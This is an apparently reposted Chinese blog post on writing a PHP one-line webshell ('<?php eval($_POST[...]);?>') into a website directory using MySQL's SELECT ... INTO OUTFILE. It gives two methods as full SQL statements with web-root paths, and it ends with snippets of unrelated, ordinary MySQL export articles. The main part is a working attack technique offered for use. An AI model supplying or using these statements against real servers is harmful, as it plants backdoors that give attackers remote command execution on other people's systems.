MySQL 导出一句话

听说是很老的东西了,学习的时候发现还是很好用的,故学习转载过来,留备学习。

mysql 导出一句话  

  • 方法1:网上流行的方法

流程:(1)建表--->(2)插入数据--->(3)select查询导出 

USE test;                                    #调用test数据库;DROP TABLE IF EXISTS tmp;                    # 测试当前数据中是否存在tmp表;CREATE TABLE tmp(cmd TEXT NOT NULL);         # 创建表tmp,且其中的字段为cmd,值不能为空;INSERT INTO tmp(cmd) VALUES (‘<?php @eval($_POST[‘pass‘]);?>‘);  # 向tmp表中cmd字段插入一句话;SELECT cmd FROM hello INTO OUTFILE ‘/home/htdocs/ok.php‘;        # 使用 select ‘sth‘ into outfile ‘网站物理路径‘;DROP TABLE tmp;                                                  # 删除表tmp。

Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES(‘<? php eval($_POST[cmd]);?>‘); //把一句话木马插入到temp表
Select cmd from temp into out file ‘d:/wwwroot/1.php‘; //查询temp表中的一句话并把结果导入到eval.php
Drop TABLE IF EXISTS temp; //删除temp

  • 方法2:直接select 查询导出一句话

  还有一个思路,就是通过select ‘一句话‘ into outfile ‘网站物理路径‘ 即可,具体操作语句如下:

  select ‘<? php eval($_POST[cmd]);?>‘ into outfile ‘d:/phpstudy/wwww/1.php‘;

  这样做简洁明了,没那么多废话。不知道网上的方法要操作那么复杂(建表-插入数据-最后从表中导出数据),真心复杂!!!

  如果谁知道,网上这样操作的原因,请给我留言分享下!!!

时间: 2024-12-15 01:48:53

MySQL 导出一句话的相关文章

mysql导出文件到txt并指定字段分隔符;mysql导出到xls文件sql试例

mysql > select m.asset_id, m.asset_name, m.director, m.actor, m.country_of_origin, m.years, concat('http://192.167.1.120:15414/',p.poster_url),m.category  from ao_movie_tab m, ao_poster_tab p where m.asset_id = p.asset_id group by m.asset_id order by

mysql导出数据库几种方法

mysql教程导出数据库教程几种方法 方法一 cmd 到mysql bin目录下用 如下命令 mysqldump --opt -h192.168.0.156 -uusername -ppassword --skip-lock-tables databasename>database.sql 把ip改成localhost就可以的 如果装了navicate那就更简单了 先连接上数据库,选中数据库 再选择转储sql 就好了 方法二进入cmd (注意在os cmd中 而不是在mysql中) ======

MYSQL 导出多个库

[email protected]:~# cat dumphelp.sh DATABASES_TO_EXCLUDE="test" EXCLUSION_LIST="'information_schema','mysql'" for DB in `echo "${DATABASES_TO_EXCLUDE}"` do EXCLUSION_LIST="${EXCLUSION_LIST},'${DB}'" done SQLSTMT=&q

MySQL 导出数据

MySQL 导出数据 MySQL中你可以使用SELECT...INTO OUTFILE语句来简单的导出数据到文本文件上. 使用 SELECT ... INTO OUTFILE 语句导出数据 以下实例中我们将数据表 tutorials_tbl 数据导出到 /tmp/tutorials.txt 文件中: mysql> SELECT * FROM tutorials_tbl -> INTO OUTFILE '/tmp/tutorials.txt'; 你可以通过命令选项来设置数据输出的指定格式,以下实

mysql导出存储过程或函数

查询数据库中的存储过程和函数方法一:select `name` from mysql.proc where db = 'your_db_name' and `type` = 'PROCEDURE'   //存储过程select `name` from mysql.proc where db = 'your_db_name' and `type` = 'FUNCTION'   //函数方法二:show procedure status; //存储过程show function status;   

从navicat for mysql导出数据库语句时应该加上的两条语句

为了不引起编码问题,一般在从navict for mysql导出一个数据库时在文件最前面添加这2句语句: CREATE DATABASE IF NOT EXISTS `` default character set utf8 COLLATE utf8_general_ci; USE ``; 其中在引号里填写的事数据库的名称

[转]mysql导出导入中文表解决方法

在开发过程中会经常用到mysql导出导入中文表,本文将详细介绍其如何使用,需要的朋友可以参考下. 在开发过程中会经常用到mysql导出导入中文表,本文将详细介绍其如何使用,需要的朋友可以参考下一.先针对utf8导出: (1)导出源数据库的所有表: 代码如下: mysqldump -u root -p密码 --socket=mysql.sock --default-character-set=utf8 --set-charset=utf8 --hex-blob --databases 数据库名 >

mysql 导出过长的数字列时变科学计数法问题解决办法

--mysql 导出数据时,  数字类型的列如果位数过长,变为科学技术发问题 concat('\t',a.IDCARD_NO) 例子: select   concat('\t',a.IDCARD_NO)   from   表a  as  a

navicate for mysql 导出sql脚本,然后通过notepad++ 正则表达式加工

navicate for mysql 导出sql脚本,然后通过notepad++加工 使用目标:提取所有的 drop table sql脚本 效果图: 我的操作步骤: step 1,在 navicate for mySQL 中 选中某个数据库,然后 右键 -> Dump SQL File , 然后选择保存路径, 会保存为一个 sql脚本文件,包括 建table 及 table 的insert 脚本. step 2,   打开这个sql脚本文件,然后 copy至 notepad++ step 3,